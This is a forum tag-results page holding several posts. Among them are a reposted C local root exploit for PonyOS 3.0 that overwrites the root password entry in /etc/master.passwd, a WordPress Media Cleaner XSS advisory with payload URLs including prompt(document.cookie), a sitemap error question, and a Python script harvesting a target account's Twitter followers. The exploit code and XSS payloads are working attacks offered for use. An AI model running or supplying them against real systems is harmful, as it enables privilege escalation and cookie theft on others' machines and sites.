Search the Community
Showing results for tags 'line'.
-
# Exploit Title: PonyOS <= 3.0 VFS permissions exploit # Google Dork: [if applicable] # Date: 29th May 2015 # Exploit Author: Hacker Fantastic # Vendor Homepage: www.ponyos.org # Software Link: [download link if available] # Version: 3.0 # Tested on: 3.0 # CVE : N/A # Source: https://github.com/HackerFantastic/Public/blob/master/exploits/rarity.c /* MyLittleUnix <= 3.0 VFS permissions root exploit ================================================ File permissions are not checked, we can abuse this to replace the root user password with our own and escalate our privileges. This exploit now 20% cooler and tested on latest 3.0 mlp OS. -- prdelka */ #include <stdio.h> #include <stdlib.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> char* pwnystr = "root:07821d2459368443042007bf1c7cdf3c55284" "29a65f8f10ce388d301b47865a283147bfd290545b" "0b9b12ae622a8eb359497cb3635506f99d2f5e4c4e" "594cadd:0:0:HackerFantastic:/home/root:/bi" "n/sh:fancy\n"; int main(){ int fd, r; struct stat *fileinfo = malloc(sizeof(struct stat)); char *buffer, *line, *filenm = "/etc/master.passwd"; printf("[+] MyLittleUnix <=3.0 VFS permissions local root exploit\n"); fd = open(filenm,O_RDWR); r = stat(filenm,fileinfo); buffer = malloc((uint)fileinfo->st_size); if(buffer){ read(fd,buffer,fileinfo->st_size); } else{ printf("[!] No pwn for you pwnie\n"); exit(0); } lseek(fd,0,SEEK_SET); line = strtok(buffer,"\n"); while(line){ if(strstr(line,"root:")){ write(fd,pwnystr,strlen(pwnystr)); } else{ write(fd,line,strlen(line)); write(fd,"\n",strlen("\n")); } line = strtok(NULL,"\n"); } close(fd); printf("[-] 20percent COOLER! user 'root' password is 'pwnies'\n"); exit(0); } Source @ManutaDeAur exact ce i-am raspuns si lu byte-ul am sa iti raspund si tie:
-
Salut. Am instalat Premium SEO pack . si la sitempa xml imi da eroarea asta . Ma poate ajuta careva? This page contains the following errors: error on line 5 at column 51: xmlns:schemaLocation: 'http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd' is not a valid URI Below is a rendering of the page up to the first error.
-
# Exploit Title: Wordpress Media Cleaner - XSS # Author: ?smail SAYGILI # Web Site: www.ismailsaygili.com.tr # E-Mail: iletisim@ismailsaygili.com.tr # Date: 2015-02-26 # Plugin Download: https://downloads.wordpress.org/plugin/wp-media-cleaner.2.2.6.zip # Version: 2.2.6 # Vulnerable File(s): [+] wp-media-cleaner.php # Vulnerable Code(s): [+] 647. Line $view = $_GET['view'] : "issues"; [+] 648. Line $paged = $_GET['paged'] : 1; [+] 653. Line $s = isset ( $_GET[ 's' ] ) ? $_GET[ 's' ] : null; # Request Method(s): [+] GET # Vulnerable Parameter(s): [+] view, paged, s # Proof of Concept --> http://target.com/wordpress/wp-admin/upload.php?s=test&page=wp-media-cleaner&view={XSS}&paged={XSS}&s={XSS} --> http://localhost/wordpress/wp-admin/upload.php?s=test&page=wp-media-cleaner&view="><img src=i onerror=prompt(/xss/)>&paged="><img src=i onerror=prompt(document.cookie)>&s="><img src=i onerror=prompt(/XSS/)> Source
-
Hello, Un nene a descoperit cum sa traga followers de pe conturi de twitter, Collecting Twitter Followers with 25 lines of Python, si a scris un script in Python2 dupa cum urmeaza: " import tweepy import time #insert your Twitter keys here consumer_key ='bla bla' consumer_secret='bla bla' access_token='bla bla' access_secret='bla bla' auth = tweepy.auth.OAuthHandler(consumer_key, consumer_secret) auth.set_access_token(access_token, access_secret) api = tweepy.API(auth) list= open('/go-to-war/Desktop/twitter_list.txt','w') if(api.verify_credentials): print 'We sucessfully logged in' user = tweepy.Cursor(api.followers, screen_name="<targeted_twitter_account>").items() while True: try: u = next(user) list.write(u.screen_name +' n') except: time.sleep(15*60) print 'We got a timeout ... Sleeping for 15 minutes' u = next(user) list.write(u.screen_name +' n') list.close() " Intrebarea mea este, l-a incercat cineva si i-a mers? Eu l-am pornit, sta o perioda pana expira cele 15 minute alocate unui interval valid de interogare si pe urma iese cu urmatoarea eroare: "Traceback (most recent call last): File "twitter_followers_harvesting.py", line 28, in <module> u = next(user) File "/usr/lib/python2.7/dist-packages/tweepy/cursor.py", line 110, in next self.current_page = self.page_iterator.next() File "/usr/lib/python2.7/dist-packages/tweepy/cursor.py", line 60, in next cursor=self.next_cursor, *self.args, **self.kargs File "/usr/lib/python2.7/dist-packages/tweepy/binder.py", line 179, in _call return method.execute() File "/usr/lib/python2.7/dist-packages/tweepy/binder.py", line 162, in execute raise TweepError(error_msg, resp) tweepy.error.TweepError: [{'message': 'Sorry, that page does not exist', 'code': 34}] " Merci fain.